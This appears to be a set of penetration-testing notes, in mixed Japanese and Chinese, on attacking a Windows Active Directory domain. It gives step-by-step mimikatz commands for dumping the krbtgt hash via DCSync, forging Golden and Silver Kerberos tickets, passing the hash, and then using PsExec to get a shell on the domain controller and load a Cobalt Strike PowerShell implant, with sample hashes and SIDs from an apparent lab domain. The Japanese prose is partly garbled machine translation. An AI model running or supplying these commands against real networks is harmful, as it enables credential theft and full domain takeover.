金紙幣と銀紙幣

ゴールデンチケット

攻撃者がドメインコントローラーの管理権限
klistを取得し、ドメインメンバーホストでklistを実行すると、キャッシュされたチケットの
klistパージを表示できます。
ドメイン侵入プロセス中にチケットをクリアします。ドメイン管理者のパスワードが変更されている場合は、次を使用してみてください。 krbtgtユーザーの履歴ハッシュはチケット配信攻撃に使用されます。通常、情報を収集するためにkrbtgtユーザーのパスワードを変更する人は誰もいません
。

域名 net time /domain    ipconfig /all 
伪造管理员用户名 net group "domain admins"
krbtgt账号的哈希值  mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
域的SID值(去掉最后的500)  wmic useraccount get name,sid
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit

利用

#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit

#pass the ticket票据传递，获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

シルバーチケット

偽のTGSは、指定されたサーバー情報コレクションにのみアクセスできます

域名 net time /domain    ipconfig /all 
域的SID值(去掉最后的500)  wmic useraccount get name,sid
目标机器的FQDN  net time /domain  就是hostname+域名 /target:\\WIN-75NA0949GFB.NOONE.com
可利用的服务CIFS(磁盘共享的服务) /service:CIFS	
要伪造的用户名  /user:Administrator
服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB$带$的hash，不是admin的) /rc4:08d93ddf15a6309a46daaa7ec8565296
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs	服务参数为cifs
/domain    参数为域名
/sid	   参数为域sid (whoami /user)
/target    The FDQN 指定域内的机器  /target:WIN-75NA0949GFB.NOONE.com
/rc4       服务账号的ntml hash
/user      需要伪造的用户名  NTLM Hash of User Password/Computer Password

利用

#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#伪造白银票据，伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit

dir \\WIN-75NA0949GFB.NOONE.com\c$

ハッシュを渡す

拿到本地管理员权限,如果域控的密码和web本地管理员的密码相同可用pth

#提升权限且获取hash
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt  
#hash传递
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
#列出域控主机C盘
dir  \\WIN-75NA0949GFB.NOONE.com\c$

只看域控的C盘很没意思吧，那就来点有意思的
在受控的域成员主机上 上传PsExec.exe，进到所在目录(https://github.com/vijayphilip/PsExecRemoteWinEC2)
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe 即可反弹域控的shell
然后cs生成powershell马，使域控主机上线

注：エラーkuhl_m_kerberos_ptt_data; LsaCa​​llAuthenticationPackage KerbSubmitTicketMessage：c000000d
一連の実験の後、ドメインメンバーホストがWindowsXPまたはWindowsServer 2003の場合、通常どおりチケットを偽造することはできません。